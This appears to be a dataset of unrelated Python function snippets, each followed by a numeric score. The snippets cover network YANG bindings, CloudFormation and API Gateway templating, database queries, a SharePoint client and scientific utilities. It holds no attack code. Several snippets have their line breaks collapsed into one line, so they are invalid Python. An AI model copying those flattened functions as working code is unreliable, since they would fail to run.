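# Matrix([[0, 0, 0], [1, 0, 0], [0, sqrt(2), 0]])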
def _set_clear_mpls_auto_bandwidth_statistics_all(self, v, load=False): """ Setter method for clear_mpls_auto_bandwidth_statistics_all, mapped from YANG variable /brocade_mpls_rpc/clear_mpls_auto_bandwidth_statistics_all (rpc) If this variable is read-only (config: false) in the source YANG file, then _set_clear_mpls_auto_bandwidth_statistics_all is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_clear_mpls_auto_bandwidth_statistics_all() directly. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=clear_mpls_auto_bandwidth_statistics_all.clear_mpls_auto_bandwidth_statistics_all, is_leaf=True, yang_name="clear-mpls-auto-bandwidth-statistics-all", rest_name="clear-mpls-auto-bandwidth-statistics-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'hidden': u'rpccmd', u'actionpoint': u'clearMplsAutoBandwidthStatisticsAll'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='rpc', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """clear_mpls_auto_bandwidth_statistics_all must be of a type compatible with rpc""", 'defined-type': "rpc", 'generated-type': """YANGDynClass(base=clear_mpls_auto_bandwidth_statistics_all.clear_mpls_auto_bandwidth_statistics_all, is_leaf=True, yang_name="clear-mpls-auto-bandwidth-statistics-all", rest_name="clear-mpls-auto-bandwidth-statistics-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, extensions={u'tailf-common': {u'hidden': u'rpccmd', u'actionpoint': u'clearMplsAutoBandwidthStatisticsAll'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='rpc', is_config=True)""", }) self.__clear_mpls_auto_bandwidth_statistics_all = t if hasattr(self, '_set'): self._set()
0.005831
def _parameterize_obj(obj):
    """Recursively parameterize all strings contained in an object.

    Parameterizes all values of a Mapping, all items of a Sequence, a
    unicode string, or passes other objects through unmodified. Byte
    strings will be interpreted as UTF-8.

    Args:
        obj: data to parameterize

    Return:
        A parameterized object to be included in a CloudFormation template.
        Mappings are converted to `dict`, Sequences are converted to `list`,
        and strings possibly replaced by compositions of function calls.

    """
    if isinstance(obj, Mapping):
        return dict((key, _parameterize_obj(value))
                    for key, value in obj.items())
    elif isinstance(obj, bytes):
        return _parameterize_string(obj.decode('utf8'))
    elif isinstance(obj, str):
        return _parameterize_string(obj)
    elif isinstance(obj, Sequence):
        return list(_parameterize_obj(item) for item in obj)
    else:
        return obj
0.001006
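_parameterize_string is defined elsewhere in the module; a sketch with a placeholder stand-in shows how the recursion normalizes containers (it assumes Mapping and Sequence come from collections.abc, as they do in the real module):

from collections.abc import Mapping, Sequence

def _parameterize_string(s):
    # placeholder: the real function builds CloudFormation function calls
    return s.upper() if '${' in s else s

print(_parameterize_obj({'cmd': (b'run ${stage}', 'plain'), 'n': 3}))
# {'cmd': ['RUN ${STAGE}', 'plain'], 'n': 3}
# the tuple became a list, the byte string was decoded and transformed,
# and the int passed through unmodified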
def search_unique_identities_slice(db, term, offset, limit):
    """Look for unique identities using slicing.

    This function returns those unique identities which match the
    given `term`. The term will be compared with the name, email,
    username and source values of each identity. When an empty term
    is given, all unique identities will be returned. The results
    are limited by `offset` (starting on 0) and `limit`.

    Along with the list of unique identities, this function returns
    the total number of unique identities that match the given `term`.

    :param db: database manager
    :param term: term to match with unique identities data
    :param offset: return results starting on this position
    :param limit: maximum number of unique identities to return

    :raises InvalidValueError: raised when either the given value of
        `offset` or `limit` is lower than zero
    """
    uidentities = []
    pattern = '%' + term + '%' if term else None

    if offset < 0:
        raise InvalidValueError('offset must be greater than or equal to 0 - %s given'
                                % str(offset))
    if limit < 0:
        raise InvalidValueError('limit must be greater than or equal to 0 - %s given'
                                % str(limit))

    with db.connect() as session:
        query = session.query(UniqueIdentity).\
            join(Identity).\
            filter(UniqueIdentity.uuid == Identity.uuid)

        if pattern:
            query = query.filter(Identity.name.like(pattern)
                                 | Identity.email.like(pattern)
                                 | Identity.username.like(pattern)
                                 | Identity.source.like(pattern))

        query = query.group_by(UniqueIdentity).\
            order_by(UniqueIdentity.uuid)

        # Get the total number of unique identities for that search
        nuids = query.count()

        start = offset
        end = offset + limit

        uidentities = query.slice(start, end).all()

        # Detach objects from the session
        session.expunge_all()

    return uidentities, nuids
0.000473
def decouple(fn):
    """
    Inverse operation of couple. From a function that returns a pair of
    values, create two functions that each return one of the two values.

    Examples
    --------
    >>> h = lambda x: (2*x**3, 6*x**2)
    >>> f, g = decouple(h)

    >>> f(5)
    250

    >>> g(5)
    150
    """
    def fst(*args, **kwargs):
        return fn(*args, **kwargs)[0]

    def snd(*args, **kwargs):
        return fn(*args, **kwargs)[1]

    return fst, snd
0.00207
def build_joblist(jobgraph): """Returns a list of jobs, from a passed jobgraph.""" jobset = set() for job in jobgraph: jobset = populate_jobset(job, jobset, depth=1) return list(jobset)
0.004785
def text(self, txt, x, y, width=None, height=1000000, outline=False, draw=True, **kwargs): ''' Draws a string of text according to current font settings. :param txt: Text to output :param x: x-coordinate of the top left corner :param y: y-coordinate of the top left corner :param width: text width :param height: text height :param outline: If True draws outline text (defaults to False) :param draw: Set to False to inhibit immediate drawing (defaults to True) :return: Path object representing the text. ''' txt = self.Text(txt, x, y, width, height, outline=outline, ctx=None, **kwargs) if outline: path = txt.path if draw: path.draw() return path else: return txt
0.005931
def _pred(aclass):
    """
    :param aclass: object to test
    :return: True if `aclass` is a class defined in this module
    """
    isaclass = inspect.isclass(aclass)
    return isaclass and aclass.__module__ == _pred.__module__
0.005747
def is_binary(f):
    """Return True if binary mode."""
    # NOTE: order matters here. We don't bail on Python 2 just yet. Both
    # codecs.open() and io.open() can open in text mode, and both set the
    # encoding attribute. We must do that check first.

    # If it has an encoding attribute with a value, it is text mode.
    if getattr(f, "encoding", None):
        return False

    # Python 2 makes no further distinction.
    if not PY3:
        return True

    # If the file has a mode, and it contains b, it is binary.
    try:
        if 'b' in getattr(f, 'mode', ''):
            return True
    except TypeError:
        import gzip
        if isinstance(f, gzip.GzipFile):
            return True  # in gzip, mode is an integer
        raise

    # Can we sniff?
    try:
        f.seek(0, os.SEEK_CUR)
    except (AttributeError, IOError):
        return False

    # Finally, let's sniff by reading a byte.
    byte = f.read(1)
    f.seek(-1, os.SEEK_CUR)
    return hasattr(byte, 'decode')
0.000997
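A usage sketch on Python 3, defining the PY3 module flag the snippet relies on:

import io
import sys

PY3 = sys.version_info[0] >= 3  # module-level flag assumed by is_binary

with io.open('demo.txt', 'w', encoding='utf-8') as f:
    f.write(u'hello')

with io.open('demo.txt', encoding='utf-8') as f:
    print(is_binary(f))   # False: the handle has an encoding, so text mode

with io.open('demo.txt', 'rb') as f:
    print(is_binary(f))   # True: 'b' is in the mode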
def generic_filter(generic_qs_model, filter_qs_model, gfk_field=None):
    """
    Only show me ratings made on foods that start with "a":

        a_foods = Food.objects.filter(name__startswith='a')
        generic_filter(Rating.objects.all(), a_foods)

    Only show me comments from entries that are marked as public:

        generic_filter(Comment.objects.public(), Entry.objects.public())

    :param generic_qs_model: A model or queryset containing a GFK, e.g. comments
    :param filter_qs_model: A model or a queryset of objects you want to restrict
        the generic_qs to
    :param gfk_field: explicitly specify the field with the GFK
    """
    generic_qs = normalize_qs_model(generic_qs_model)
    filter_qs = normalize_qs_model(filter_qs_model)

    if not gfk_field:
        gfk_field = get_gfk_field(generic_qs.model)

    pk_field_type = get_field_type(filter_qs.model._meta.pk)
    gfk_field_type = get_field_type(generic_qs.model._meta.get_field(gfk_field.fk_field))

    if pk_field_type != gfk_field_type:
        return fallback_generic_filter(generic_qs, filter_qs, gfk_field)

    return generic_qs.filter(**{
        gfk_field.ct_field: ContentType.objects.get_for_model(filter_qs.model),
        '%s__in' % gfk_field.fk_field: filter_qs.values('pk'),
    })
0.008488
def is_valid_ipv6_prefix(ipv6_prefix): """Returns True if given `ipv6_prefix` is a valid IPv6 prefix.""" # Validate input type if not isinstance(ipv6_prefix, str): return False tokens = ipv6_prefix.split('/') if len(tokens) != 2: return False # Validate address/mask and return return is_valid_ipv6(tokens[0]) and is_valid_ip_prefix(tokens[1], 128)
0.002532
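The is_valid_ipv6 and is_valid_ip_prefix helpers are not shown. For comparison, a roughly equivalent check built on the stdlib ipaddress module (not the snippet's own helpers):

import ipaddress

def is_valid_ipv6_prefix_stdlib(p):
    # a prefix must contain a mask and parse as an IPv6 network
    try:
        ipaddress.IPv6Network(p, strict=False)
        return '/' in p
    except ValueError:
        return False

print(is_valid_ipv6_prefix_stdlib('2001:db8::/32'))   # True
print(is_valid_ipv6_prefix_stdlib('2001:db8::'))      # False: no mask
print(is_valid_ipv6_prefix_stdlib('2001:db8::/200'))  # False: mask > 128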
def feeds(ctx, assets, pricethreshold, maxage):
    """ Price Feed Overview
    """
    import builtins

    witnesses = Witnesses(bitshares_instance=ctx.bitshares)

    def test_price(p, ref):
        if math.fabs(float(p / ref) - 1.0) > pricethreshold / 100.0:
            return click.style(str(p), fg="red")
        elif math.fabs(float(p / ref) - 1.0) > pricethreshold / 2.0 / 100.0:
            return click.style(str(p), fg="yellow")
        else:
            return click.style(str(p), fg="green")

    def price_diff(p, ref):
        d = (float(p) - float(ref)) / float(ref) * 100
        if math.fabs(d) >= 5:
            color = "red"
        elif math.fabs(d) >= 2.5:
            color = "yellow"
        else:
            color = "green"
        return click.style("{:8.2f}%".format(d), fg=color)

    def test_date(d):
        t = d.replace(tzinfo=None)
        now = datetime.utcnow()
        # green while fresh (younger than maxage/2), yellow while aging
        # (younger than maxage), red once older than maxage
        if now < t + timedelta(minutes=maxage / 2.0):
            return click.style(str(t), fg="green")
        if now < t + timedelta(minutes=maxage):
            return click.style(str(t), fg="yellow")
        else:
            return click.style(str(t), fg="red")

    output = ""
    for asset in tqdm(assets):
        t = PrettyTable(
            [
                "Asset",
                "Producer",
                "Active Witness",
                "Date",
                "Settlement Price",
                "Core Exchange Price",
                "MCR",
                "SSPR",
                "delta",
            ]
        )
        t.align = "c"
        t.align["Producer"] = "l"
        asset = Asset(asset, full=True, bitshares_instance=ctx.bitshares)
        current_feed = asset.feed
        feeds = asset.feeds
        producingwitnesses = builtins.set()
        witness_accounts = [x["witness_account"] for x in witnesses]
        for feed in tqdm(feeds):
            producingwitnesses.add(feed["producer"]["id"])
            t.add_row(
                [
                    asset["symbol"],
                    feed["producer"]["name"],
                    click.style(
                        "X" if feed["producer"]["id"] in witness_accounts else "",
                        bold=True,
                    ),
                    test_date(feed["date"]),
                    test_price(
                        feed["settlement_price"], current_feed["settlement_price"]
                    ),
                    test_price(
                        feed["core_exchange_rate"], current_feed["core_exchange_rate"]
                    ),
                    feed["maintenance_collateral_ratio"] / 10,
                    feed["maximum_short_squeeze_ratio"] / 10,
                    price_diff(
                        feed["core_exchange_rate"], current_feed["core_exchange_rate"]
                    ),
                ]
            )
        for missing in builtins.set(witness_accounts).difference(producingwitnesses):
            witness = Witness(missing)
            t.add_row(
                [
                    click.style(asset["symbol"], bg="red"),
                    click.style(witness.account["name"], bg="red"),
                    # every missing producer is, by construction, an
                    # active witness
                    click.style("X" if missing in witness_accounts else "",
                                bold=True),
                    click.style(str(datetime(1970, 1, 1))),
                    click.style("missing", bg="red"),
                    click.style("missing", bg="red"),
                    click.style("missing", bg="red"),
                    click.style("missing", bg="red"),
                    click.style("missing", bg="red"),
                ]
            )
        output += t.get_string(sortby="Date", reversesort=True)
        output += "\n"
    click.echo(output)
0.001845
def rank_for_in(self, leaderboard_name, member):
    '''
    Retrieve the rank for a member in the named leaderboard.

    @param leaderboard_name [String] Name of the leaderboard.
    @param member [String] Member name.
    @return the rank for a member in the leaderboard, or None if the
        member is not ranked.
    '''
    if self.order == self.ASC:
        rank = self.redis_connection.zrank(leaderboard_name, member)
    else:
        rank = self.redis_connection.zrevrank(leaderboard_name, member)

    # zrank/zrevrank return None for unknown members; ranks are 0-based
    return rank + 1 if rank is not None else None
0.00578
def __read_graph(self, network_filename): """ Read .ncol network file :param network_filename: complete path for the .ncol file :return: an undirected network """ self.g = nx.read_edgelist(network_filename, nodetype=int)
0.007435
def define(self, key, value): """ Defines the value for the inputted key by setting both its default and \ value to the inputted value. :param key | <str> value | <variant> """ skey = nstr(key) self._defaults[skey] = value self[skey] = value
0.01173
def get_agent(self): """Gets the ``Agent`` identified in this authentication credential. :return: the ``Agent`` :rtype: ``osid.authentication.Agent`` :raise: ``OperationFailed`` -- unable to complete request *compliance: mandatory -- This method must be implemented.* """ agent_id = self.get_agent_id() return Agent(identifier=agent_id.identifier, namespace=agent_id.namespace, authority=agent_id.authority)
0.003876
def shutdown(self): """ Shutdown the application and exit :returns: No return value """ task = asyncio.ensure_future(self.core.shutdown()) self.loop.run_until_complete(task)
0.009009
def ingest(self): """*Import the IFS catalogue into the sherlock-catalogues database* The method first generates a list of python dictionaries from the IFS datafile, imports this list of dictionaries into a database table and then generates the HTMIDs for that table. **Usage:** See class docstring for usage """ self.log.debug('starting the ``get`` method') self.primaryIdColumnName = "primaryId" self.raColName = "raDeg" self.declColName = "decDeg" self.dbTableName = "tcs_cat_ifs_stream" self.databaseInsertbatchSize = 500 dictList = self._create_dictionary_of_IFS() tableName = self.dbTableName createStatement = """ CREATE TABLE `%(tableName)s` ( `primaryId` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'An internal counter', `dateCreated` datetime DEFAULT CURRENT_TIMESTAMP, `decDeg` double DEFAULT NULL, `name` varchar(100) COLLATE utf8_unicode_ci DEFAULT NULL, `raDeg` double DEFAULT NULL, `z` double DEFAULT NULL, `htm16ID` bigint(20) DEFAULT NULL, `htm10ID` bigint(20) DEFAULT NULL, `htm13ID` bigint(20) DEFAULT NULL, `dateLastModified` datetime DEFAULT CURRENT_TIMESTAMP, `updated` varchar(45) DEFAULT '0', PRIMARY KEY (`primaryId`), UNIQUE KEY `radeg_decdeg` (`raDeg`,`decDeg`), KEY `idx_htm16ID` (`htm16ID`), KEY `idx_htm10ID` (`htm10ID`), KEY `idx_htm13ID` (`htm13ID`) ) ENGINE=MyISAM AUTO_INCREMENT=0 DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; """ % locals() self.add_data_to_database_table( dictList=dictList, createStatement=createStatement ) self.log.debug('completed the ``get`` method') return None
0.003322
def create_api_gateway_routes( self, lambda_arn, api_name=None, api_key_required=False, authorization_type='NONE', authorizer=None, cors_options=None, description=None, endpoint_configuration=None ): """ Create the API Gateway for this Zappa deployment. Returns the new RestAPI CF resource. """ restapi = troposphere.apigateway.RestApi('Api') restapi.Name = api_name or lambda_arn.split(':')[-1] if not description: description = 'Created automatically by Zappa.' restapi.Description = description endpoint_configuration = [] if endpoint_configuration is None else endpoint_configuration if self.boto_session.region_name == "us-gov-west-1": endpoint_configuration.append("REGIONAL") if endpoint_configuration: endpoint = troposphere.apigateway.EndpointConfiguration() endpoint.Types = list(set(endpoint_configuration)) restapi.EndpointConfiguration = endpoint if self.apigateway_policy: restapi.Policy = json.loads(self.apigateway_policy) self.cf_template.add_resource(restapi) root_id = troposphere.GetAtt(restapi, 'RootResourceId') invocation_prefix = "aws" if self.boto_session.region_name != "us-gov-west-1" else "aws-us-gov" invocations_uri = 'arn:' + invocation_prefix + ':apigateway:' + self.boto_session.region_name + ':lambda:path/2015-03-31/functions/' + lambda_arn + '/invocations' ## # The Resources ## authorizer_resource = None if authorizer: authorizer_lambda_arn = authorizer.get('arn', lambda_arn) lambda_uri = 'arn:{invocation_prefix}:apigateway:{region_name}:lambda:path/2015-03-31/functions/{lambda_arn}/invocations'.format( invocation_prefix=invocation_prefix, region_name=self.boto_session.region_name, lambda_arn=authorizer_lambda_arn ) authorizer_resource = self.create_authorizer( restapi, lambda_uri, authorizer ) self.create_and_setup_methods( restapi, root_id, api_key_required, invocations_uri, authorization_type, authorizer_resource, 0 ) if cors_options: self.create_and_setup_cors( restapi, root_id, invocations_uri, 0, cors_options ) resource = troposphere.apigateway.Resource('ResourceAnyPathSlashed') self.cf_api_resources.append(resource.title) resource.RestApiId = troposphere.Ref(restapi) resource.ParentId = root_id resource.PathPart = "{proxy+}" self.cf_template.add_resource(resource) self.create_and_setup_methods( restapi, resource, api_key_required, invocations_uri, authorization_type, authorizer_resource, 1 ) # pragma: no cover if cors_options: self.create_and_setup_cors( restapi, resource, invocations_uri, 1, cors_options ) # pragma: no cover return restapi
0.005158
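A minimal troposphere sketch of the RestApi pattern used above, runnable on its own if troposphere is installed (the api name is made up):

import troposphere
import troposphere.apigateway

template = troposphere.Template()
restapi = troposphere.apigateway.RestApi('Api')
restapi.Name = 'my-api'  # hypothetical name
restapi.Description = 'Created automatically by Zappa.'
template.add_resource(restapi)
# emits CloudFormation JSON with an AWS::ApiGateway::RestApi resource
print(template.to_json())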
def AddList(self, listName, description, templateID):
    """Create a new List
    Provide: List Name, List Description, and List Template
    Templates Include:
        Announcements
        Contacts
        Custom List
        Custom List in Datasheet View
        DataSources
        Discussion Board
        Document Library
        Events
        Form Library
        Issues
        Links
        Picture Library
        Survey
        Tasks
    """
    templateIDs = {'Announcements': '104',
                   'Contacts': '105',
                   'Custom List': '100',
                   'Custom List in Datasheet View': '120',
                   'DataSources': '110',
                   'Discussion Board': '108',
                   'Document Library': '101',
                   'Events': '106',
                   'Form Library': '115',
                   'Issues': '1100',
                   'Links': '103',
                   'Picture Library': '109',
                   'Survey': '102',
                   'Tasks': '107'}

    # Automatically convert the different ways the templateID
    # can be specified
    if isinstance(templateID, int):
        templateID = str(templateID)
    elif isinstance(templateID, str):
        if not templateID.isdigit():
            templateID = templateIDs[templateID]

    # Build Request
    soap_request = soap('AddList')
    soap_request.add_parameter('listName', listName)
    soap_request.add_parameter('description', description)
    soap_request.add_parameter('templateID', templateID)
    self.last_request = str(soap_request)

    # Send Request
    response = self._session.post(url=self._url('Lists'),
                                  headers=self._headers('AddList'),
                                  data=str(soap_request),
                                  verify=self._verify_ssl,
                                  timeout=self.timeout)

    # Parse Request
    if response.status_code == 200:
        return response.text
    else:
        return response
0.000818
def do_statement(source, start):
    """Returns None if no statement is found at `start`; the other
    functions that begin with 'do_' raise instead. Like them, this
    do_ type function skips leading white space."""
    start = pass_white(source, start)
    # start is now the first position after the initial start that is
    # neither white space nor \n
    if not start < len(source):  # finished parsing
        return None, start
    if any(startswith_keyword(source[start:], e) for e in {'case', 'default'}):
        return None, start
    rest = source[start:]
    for key, meth in KEYWORD_METHODS.iteritems(
    ):  # check for statements that are uniquely defined by their keywords
        if rest.startswith(key):
            # has to start with this keyword and the next letter after the
            # keyword must be either EOF or not in IDENTIFIER_PART
            if len(key) == len(rest) or rest[len(key)] not in IDENTIFIER_PART:
                return meth(source, start)
    if rest[0] == '{':  # Block
        return do_block(source, start)
    # Now only label and expression are left
    cand = parse_identifier(source, start, False)
    if cand is not None:  # it can mean that it's a label
        label, cand_start = cand
        cand_start = pass_white(source, cand_start)
        if source[cand_start] == ':':
            return do_label(source, start)
    return do_expression(source, start)
0.00374
def _create_add_petabencana_layer_action(self):
    """Create action for adding the PetaBencana flood layer."""
    icon = resources_path('img', 'icons', 'add-petabencana-layer.svg')
    self.action_add_petabencana_layer = QAction(
        QIcon(icon),
        self.tr('Add PetaBencana Flood Layer'),
        self.iface.mainWindow())
    self.action_add_petabencana_layer.setStatusTip(self.tr(
        'Add PetaBencana Flood Layer'))
    self.action_add_petabencana_layer.setWhatsThis(self.tr(
        'Use this to add a PetaBencana layer to your map. '
        'It needs internet access to function.'))
    self.action_add_petabencana_layer.triggered.connect(
        self.add_petabencana_layer)
    self.add_action(
        self.action_add_petabencana_layer,
        add_to_toolbar=self.full_toolbar)
0.002356
def get_parent_bin_ids(self, bin_id): """Gets the parent ``Ids`` of the given bin. arg: bin_id (osid.id.Id): the ``Id`` of a bin return: (osid.id.IdList) - the parent ``Ids`` of the bin raise: NotFound - ``bin_id`` is not found raise: NullArgument - ``bin_id`` is ``null`` raise: OperationFailed - unable to complete request raise: PermissionDenied - authorization failure *compliance: mandatory -- This method must be implemented.* """ # Implemented from template for # osid.resource.BinHierarchySession.get_parent_bin_ids if self._catalog_session is not None: return self._catalog_session.get_parent_catalog_ids(catalog_id=bin_id) return self._hierarchy_session.get_parents(id_=bin_id)
0.003695
def canFetchMore(self, index):
    '''Return whether more data is available for *index*.'''
    if not index.isValid():
        item = self.root
    else:
        item = index.internalPointer()

    return item.canFetchMore()
0.008299
def bounds(self) -> typing.Tuple[typing.Tuple[float, float], typing.Tuple[float, float]]: """Return the bounds property in relative coordinates. Bounds is a tuple ((top, left), (height, width))""" ...
0.013333
def process_incoming_tuples(self):
    """Should be called when a tuple is buffered into in_stream

    This method is equivalent to ``addBoltTasks()`` but is designed for
    event-driven single-thread bolts.
    """
    # back-pressure
    if self.output_helper.is_out_queue_available():
        self._read_tuples_and_execute()
        self.output_helper.send_out_tuples()
    else:
        # update out-queue full count
        self.bolt_metrics.update_out_queue_full_count()
0.010707
def import_tags(self, tag_nodes):
    """
    Import all the tags from 'wp:tag' nodes, because tags in 'item'
    nodes are not necessarily all the tags. Use only the nicename,
    because it is like a slug and the true tag name may not be valid
    for URL usage.
    """
    self.write_out(self.style.STEP('- Importing tags\n'))
    for tag_node in tag_nodes:
        tag_name = tag_node.find(
            '{%s}tag_slug' % WP_NS).text[:50]
        self.write_out('> %s... ' % tag_name)
        Tag.objects.get_or_create(name=tag_name)
        self.write_out(self.style.ITEM('OK\n'))
0.003125
def delete(self, request, bot_id, hook_id, id, format=None): """ Delete an existing telegram recipient --- responseMessages: - code: 401 message: Not authenticated """ bot = self.get_bot(bot_id, request.user) hook = self.get_hook(hook_id, bot, request.user) recipient = self.get_recipient(id, hook, request.user) recipient.delete() return Response(status=status.HTTP_204_NO_CONTENT)
0.00611
def dirpath_to_list(p): ''' dirpath_to_list(path) yields a list of directories contained in the given path specification. A path may be either a single directory name (==> [path]), a :-separated list of directories (==> path.split(':')), a list of directory names (==> path), or None (==> []). Note that the return value filters out parts of the path that are not directories. ''' if p is None: p = [] elif pimms.is_str(p): p = p.split(':') if len(p) > 0 and not pimms.is_vector(p, str): raise ValueError('Path is not equivalent to a list of dirs') return [pp for pp in p if os.path.isdir(pp)]
0.01087
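Assuming a POSIX system and the pimms predicates available to the module, typical behavior looks like:

import tempfile

d = tempfile.mkdtemp()
print(dirpath_to_list(None))                          # []
print(dirpath_to_list('{0}:/no/such/dir'.format(d)))  # [d]  (non-dirs filtered)
print(dirpath_to_list([d, d]))                        # [d, d]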
def get_run_threads(ns_run): """ Get the individual threads from a nested sampling run. Parameters ---------- ns_run: dict Nested sampling run dict (see data_processing module docstring for more details). Returns ------- threads: list of numpy array Each thread (list element) is a samples array containing columns [logl, thread label, change in nlive at sample, (thetas)] with each row representing a single sample. """ samples = array_given_run(ns_run) unique_threads = np.unique(ns_run['thread_labels']) assert ns_run['thread_min_max'].shape[0] == unique_threads.shape[0], ( 'some threads have no points! {0} != {1}'.format( unique_threads.shape[0], ns_run['thread_min_max'].shape[0])) threads = [] for i, th_lab in enumerate(unique_threads): thread_array = samples[np.where(samples[:, 1] == th_lab)] # delete changes in nlive due to other threads in the run thread_array[:, 2] = 0 thread_array[-1, 2] = -1 min_max = np.reshape(ns_run['thread_min_max'][i, :], (1, 2)) assert min_max[0, 1] == thread_array[-1, 0], ( 'thread max logl should equal logl of its final point!') threads.append(dict_given_run_array(thread_array, min_max)) return threads
0.000747